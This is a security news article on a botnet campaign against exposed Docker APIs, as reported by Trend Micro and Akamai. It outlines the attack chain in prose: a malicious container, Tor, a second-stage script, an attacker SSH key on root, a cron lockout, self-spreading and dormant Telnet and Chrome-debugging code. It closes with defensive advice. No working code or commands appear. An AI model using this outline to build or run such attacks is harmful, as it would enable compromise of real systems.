A new wave of attacks targeting exposed Docker APIs is showing signs of evolving into a sophisticated botnet campaign. Originally spotted in June by Trend Micro, the activity was linked to attackers deploying cryptominers and using the Tor network to obscure their identities. Now, Akamai researchers report that the threat actors have updated their tooling with more dangerous payloads that focus on persistence, self-replication, and long-term control rather than quick resource hijacking.
The attack begins with scanning for vulnerable Docker APIs exposed on port 2375. Once identified, attackers send a container creation request that launches a modified Alpine Linux image containing a base64-encoded shell command. This command installs tools, launches a Tor daemon for anonymity, and confirms connectivity using Amazon’s checkip service. With Tor active, the compromised system downloads and executes a second-stage script, docker-init.sh, from a hidden service.
This second stage establishes persistent SSH access by adding an attacker-controlled key to the root account and sets up a cron job that blocks external access to the Docker API port every minute, effectively locking out defenders. The script also installs utilities such as masscan and torsocks to enable scanning, propagation, and evasion. A Zstandard-compressed Go binary is then retrieved and executed, functioning as a dropper for additional malware components.
The Go binary demonstrates botnet-building behavior. It scans for other exposed Docker APIs and attempts to infect them using the same method, while also removing containers deployed by rival attackers. This self-replication model aligns with typical botnet operations, where each infected node autonomously spreads the infection to new targets.
Interestingly, researchers discovered inactive code designed to exploit Telnet on port 23 with default credentials and interact with Chrome’s remote debugging interface on port 9222. These unused functions hint at future expansions, including credential theft, browser hijacking, remote file access, and distributed denial-of-service (DDoS) attacks.
Akamai concludes that the tooling is an early-stage version of a more complex botnet framework. While the current version is not fully developed, the trajectory suggests a shift from opportunistic Docker exploitation to a multi-vector platform with persistence, lateral movement, and the groundwork for advanced attacks.
For organizations running Docker, this development underscores the importance of never exposing the Docker API directly to the internet, enforcing strong access controls, and continuously monitoring for suspicious container activity. Failure to secure these endpoints risks adding critical infrastructure to a growing botnet that may soon expand beyond cryptomining into credential theft and disruptive DDoS campaigns.
